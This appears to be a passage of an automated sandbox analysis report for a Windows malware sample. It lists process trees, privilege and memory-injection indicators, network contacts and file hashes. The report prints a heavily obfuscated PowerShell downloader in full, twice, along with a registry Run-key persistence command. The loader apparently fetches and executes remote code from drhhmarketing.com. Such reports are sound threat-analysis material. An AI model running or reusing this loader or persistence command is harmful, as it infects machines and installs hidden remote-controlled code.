| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc09876545678.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjertelse = 1;Function Desertr($Tocylindret){$Designerendes=$Tocylindret.Length-$Hjertelse;$Bortledt='Substring';For( $Isotherm=5;$Isotherm -lt $Designerendes;$Isotherm+=6){$fugtplettede+=$Tocylindret.$Bortledt.Invoke( $Isotherm, $Hjertelse);}$fugtplettede;}function Unsabbatical129($Udskilt){ . ($Genkomsters) ($Udskilt);}$Trolly=Desertr 'ForsyMm,taso,yingzKammeiCyclilGs,gil.jemgaPseud/Pickp5Assu,.Rankl0Paraf Oplsn(AlympWScen,iL,vprnE.ethdChoyaoMaskew Po.ysande .npiNVi ioTEnkel Nonge1Reek.0Planl.Bjank0Karai;Subje AnonW LactiRefednAnten6Leksi4 Ofri;Dokto ValexCirk 6Ly ke4Dogfa;As.ro OrfevrTilstv Ha t:Isola1Geode2Newfo1Smaab. Prio0 Judg) Pter Bagk,GSegmeeHandocInhabkKol.noI,dra/Conf.2Aller0.dsty1Velse0Deltr0Penu,1ronns0 wart1Phasm S.bflFFe toiFordrrG,bene BrudfDu.aloNederxSt,af/Quelq1Indby2Hmorr1Tjekk.Bruge0Ud os ';$Reexcavated=Desertr 'D verUBackss dnereKrftsrRe,om-NedtrAIthe g AzoteS.rinnExscitSquea ';$Anoesis=Desertr 'kommuhRadictDyreht vranp AktisZan i: Subl/Danse/ St,gdAss.rrSpillhAppl hGanglmCherma Reder BakskOlympeE,dertSygemiBivuanNonregErhve. TaagcKonteoOatlimReimp/StavbwLail.pUncur-Vrdi.aSubstdSla.bmAnretiHuskenFlydt/ SeksTE,cavrBe mer QuadeBra,rsAlmsdn Sulfo S lirG,ldee InmesUddre.Diartq OverxLordsd Tube ';$Delves=Desertr 'Soare>Roama ';$Genkomsters=Desertr 'AntehiNannaeDiploxEnsur ';$Alterbrds='Mameyes';$Impartable = Desertr ' Ne,veTetracOmgnghterraoCheck Stri %Unp rafo.ospAndenpPigm.dFj,rla omeot,aaneaEntra%Pal.e\,ymphpFacturKosmoeFremsf,utopu N,nvlAday gHaar.eRiddenOphavcIncreymargi.St alSmot ltD apho Blad Udtry&a rid& Lite BrahmeRag fcPicothteg.voSttte Pard t A,am ';Unsabbatical129 (Desertr ',etry$bibligFinanlSn ftoHjlpeb SperaShantl Dom.:EnwomSAviseaIgenbm SledlD aniiLactonB.kisgHalsesHade,mGenner unprkSpi.seSknsvtStagesBackp2Sludd0Inter3Divor= Foto(KlippcTutelmkartod rila .luff/Fr,gmc gens Subje$LingeICrocumToll.pBiaswaScenarin eftStankaMetodb DisalPl wme ,kul)B umb ');Unsabbatical129 (Desertr 'ledn.$PrivagLaanelSt,ado Eut.b PedaaMerkalPlasm: AutoIRibesrDelina Bre.sPreaccBrutti EllibSkrt.lBillieSejern ,ride ormssMoetssToril=Retsf$GybinA I brn B.llo,oupieDrif.sSphenipopuls,orku.AflgnsUnemipDecemlSynbai.efortPilla(Porg $NulliD ZeugethawilDatervAccreeAft.nsKjest)Skraa ');$Anoesis=$Irascibleness[0];$Indues= (Desertr '.esou$LysbagS,andlTr,laoCollobOpposa S del Srhf:Indd,B xotioActinsHumane Contr Hottu ProspCr misShlem=NyansNre,uleelefaw Rumf-IfeckO Fluib,rienj.rysteBydelcDeifit Gaff E,bndSfattiyAfgrdsC,olit,plineSalsumSamme. KemiN NitrePe,datB bec.Spio.W AutoeEkstrb eliC amlilBogstib,mnde OmslnIn,olt');$Indues+=$Samlingsmrkets203[1];Unsabbatical129 ($Indues);Unsabbatical129 (Desertr ' A ti$PentaBWo,teoSitresKvadreUmtterBilleuW,ewtp .oopsfremt.FritnHVivareHema aUdflidCapsoeAm.ulrFrangsLoglo[ rnit$ Con,RMiegyeSy,ame alcix Thorc ItinafalsivFolkeaMul tt,ontreH,rdydGuava],hala=Unins$FleerT Unecr Eup.o.odgilMo,etlSvendytrefa ');$Behrigt=Desertr 'Whisk$ ordwBCulicoKlninsA prveHreaprIrrevuLamelpElusosZebor.ChervDNiketoB,otbw.isimnFor,rlQuinooKro,pa,sseld aarrF mariiAg.anlSpidsestaph(Pdago$UnadjASkvalnIntero PyroeDe,ims ishmiOutcrsPodet,Snavs$ Sturb HistuLandbkU.drys,ifoneStrann,tymoeSplitdImitaeDrop.r DupedCoop e.aboul DroieAvlsbnUncome Cata)opbrd ';$buksenederdelene=$Samlingsmrkets203[0];Unsabbatical129 (Desertr 'Oph,h$HomodgHessil ForkoProvebafstvaDelicl Kern:S.ltaBPoitrrVapori ntiub UnpreSwellr AdsciSignieLoddes Tred=Belgn(KliniTK ngwe Endos Mandtdiges-Honn PMerlraApprotSnip,hF,ste Weani$r.binbDyrehuEyepokPonjasPortieToxicnAkkore DaildCongreMesiorLargodBiffieLeeuwlAsc.peLoga n KonfeCyclo) Kaet ');while (!$Briberies) {Unsabbatical129 (Desertr 'Grina$CaricgGalvalUnproo SatibIn,egaUnderlFemci: roteAn,tviuBerksr SylliLittecTru huPartilordspa AalbtKemi eFustadBaran=Udlyd$Fotogt IncorB,unduPreute Lepi ') ;Unsabbatical129 $Behrigt;Unsabbatical129 (Desertr ' UnciSTiltrtTiradaMaddarFanattStads-LedniSTaalelSnugsebaseseDiscopTeleo Homos4Basal ');Unsabbatical129 (Desertr 'Aleci$ Dripg Blaal OutfoTra,sbcri.ia T atlActin:IntonBT,intrMassei ForlbVenteeOm,ibrHarani OutbePlexosfritn=Aquad(Japa.TMalapeOmdbns St.ttA.kac-PartiPSubinaKortetEks rhSagsa arc$Po itbsv jsuSal akBrndesDokumeVlgernNapoleBlokkdFor.ke,ilfar DatadBeacoe Gau l Ung e Forkn GalaeYalen) Hav, ') ;Unsabbatical129 (Desertr 'Simne$I,recg sch lLabrio VensbPainta,nterl T,al: D.bbFNovemrSnuggiBomlrt Erhvu PolyrWebaseEc lesSaaletSm abeGra ig ConveTaktlrOxyne=,alse$Nudelg,ongllToparoAc epbOrangaBramml Peri: Kon.sGanoilForbuvKu,lepAnlbseSubulnHazelg,afete San nNee ceUndef+Al,it+.arbe% Ma,v$Gavs I epurDemonaNaulusWhitecconuziContebMispalManipe Dy vnTjenee BegisH maps ara.ThumpcNierno PussukamganhasidtForbu ') ;$Anoesis=$Irascibleness[$Frituresteger];}$Lidelsen=288008;$Unthrid=29506;Unsabbatical129 (Desertr ',ncol$VoltagA gumlMis.poOver.bRi geaSonoglSpare: SkufEI,mats Com s NichenonaprNondiaReolp Emend=Hindu .gsjGPolygeIngratLslad-F.rspCDrankoForskn Br.vtE,treeCo chnApla.tIsln. Inddm$OversbBudgeu A.ankGr,nds Sunde GallnSma.feUnclod pr,ieSo bor ArbadCivileInddalNonareVingenChuffe Fa,t ');Unsabbatical129 (Desertr 'Rebor$ FdesgwainrlDeliboUncocb.estiaSampllN.ska:PalpelCuscukFacepk.revee,affisOpgret OverrB udeuGallikSemi t apomuDkketrDi,cosFinla Hype =Sitco Kalor[FondsS FedtyMiljbs bukstAngele.oamemCnido.SacroCTjavso oentnGallivyppereLacqur Cat.tKaoli]Pegep:Entop:Zygo.FMangerDishooImambmTopv BkjoleaSt,ndsGrundeTempo6Ox,la4TopplSf,rlatKu,surSolidiGrilnnZygotgSosi.(Hexos$Gr ssEGodsesAlu isReexpe .ogdrGoldbaSkygg)Stem, ');Unsabbatical129 (Desertr 'Dol.a$.ranegKatall UdsuoKumu.bLandfa Fed,lCito.: T,gnu,erienGuzerdFodslrHepate BerbaK,besmTimeltNephe Ultra=Filig Diplo[VierkSgigmay Delis BandtAnakoe GynimEks r. SaccTMyopoe Es.rx Tr btKdsa,.AsterE Ell n For.c RegioT,keldH,rmoiSpectnKhedagGr nd]Dicoe:nitte:SummeAsel hS .ncoC I.poI.onkuIoddit.AkeraGmidjeeSk.pttAss iSFo slt .lvor .agsiCamern UrbagAdloe(Sh tg$ tearlNonobk FrdikZeucteIntr.sIn botBacterBothyuhiphukBr.actBuncouOutplrAccepsdicti)Polyd ');Unsabbatical129 (Desertr 'Fors.$Deceng Obsel UfuloGaestbConjuaSkriblUdpre: B,naNBe ona DinnvG uffiB inkgSam,eadcbalt ngdeiEnke.oUnoxinLeninsDisa.sSuperkoddfeoSmintl TrileRam,l=Ridde$Hel.euNonexn MejedBinderKon.oeFer.iaStengm Kry,tcabre.con esHak iuFagkrb GrnssUdplatS,nderKenmaiVillinThor,g Tils(.rbej$Tron LR,foriRoutidPot,neVag,sl KasssAfdryeDe ornH.lde,Tun c$RekurU Le.anKro,otBef yhSpytsr.edali,acetdSta y)Snekk ');Unsabbatical129 $Navigationsskole;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\prefulgency.Sto && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Cuichunchulli" /t REG_EXPAND_SZ /d "%Frbiddene% -w 1 $Gylpet=(Get-ItemProperty -Path 'HKCU:\Jalopy\').nyansat;%Frbiddene% ($Gylpet)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drhhmarketing.com | udp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | 61.39.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 104.21.39.61:443 | drhhmarketing.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | 11.97.55.23.in-addr.arpa | udp |
| BE | 23.55.97.11:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 172.67.74.152:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 152.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
Files
memory/4856-0-0x00007FFBEFCA3000-0x00007FFBEFCA5000-memory.dmp
memory/4856-1-0x00000142E7150000-0x00000142E7172000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kovfzfb.5nl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4856-11-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp
memory/4856-12-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp
memory/3804-15-0x0000000004AB0000-0x0000000004AE6000-memory.dmp
memory/3804-16-0x0000000005250000-0x0000000005878000-memory.dmp
memory/3804-17-0x00000000051D0000-0x00000000051F2000-memory.dmp
memory/3804-18-0x00000000059B0000-0x0000000005A16000-memory.dmp
memory/3804-19-0x0000000005A20000-0x0000000005A86000-memory.dmp
memory/3804-29-0x0000000005B90000-0x0000000005EE4000-memory.dmp
memory/3804-30-0x0000000006070000-0x000000000608E000-memory.dmp
memory/3804-31-0x00000000060C0000-0x000000000610C000-memory.dmp
memory/3804-32-0x00000000078C0000-0x0000000007F3A000-memory.dmp
memory/3804-33-0x0000000006600000-0x000000000661A000-memory.dmp
memory/3804-34-0x0000000007320000-0x00000000073B6000-memory.dmp
memory/3804-35-0x00000000072B0000-0x00000000072D2000-memory.dmp
memory/3804-36-0x00000000084F0000-0x0000000008A94000-memory.dmp
C:\Users\Admin\AppData\Roaming\prefulgency.Sto
| MD5 | 4a4d70fe78c5f12946b4676950b00e8a |
| SHA1 | 1d7977005546ad74ee56f36552c7aaef6c8dae20 |
| SHA256 | 934c5a21da47652be278d09678d6fc16f3f3c4639bddd33c509d9b6bb024bf3f |
| SHA512 | 884f9bdd26b979f18c73280fc9270293e0b0c0a14094f8f47c74c8c08d8f033f9ff179269cc608f28097ed270c8491adf8510c512d7bcd8988c7d75e4e3c8def |
memory/3804-38-0x0000000008AA0000-0x000000000D53E000-memory.dmp
memory/4856-39-0x00007FFBEFCA3000-0x00007FFBEFCA5000-memory.dmp
memory/4856-41-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp
memory/4364-49-0x0000000000680000-0x00000000006C0000-memory.dmp
memory/4364-48-0x0000000000680000-0x00000000018D4000-memory.dmp
memory/4856-52-0x00007FFBEFCA0000-0x00007FFBF0761000-memory.dmp
memory/4364-54-0x0000000024AB0000-0x0000000024B00000-memory.dmp
memory/4364-55-0x00000000251A0000-0x0000000025232000-memory.dmp
memory/4364-56-0x0000000025140000-0x000000002514A000-memory.dmp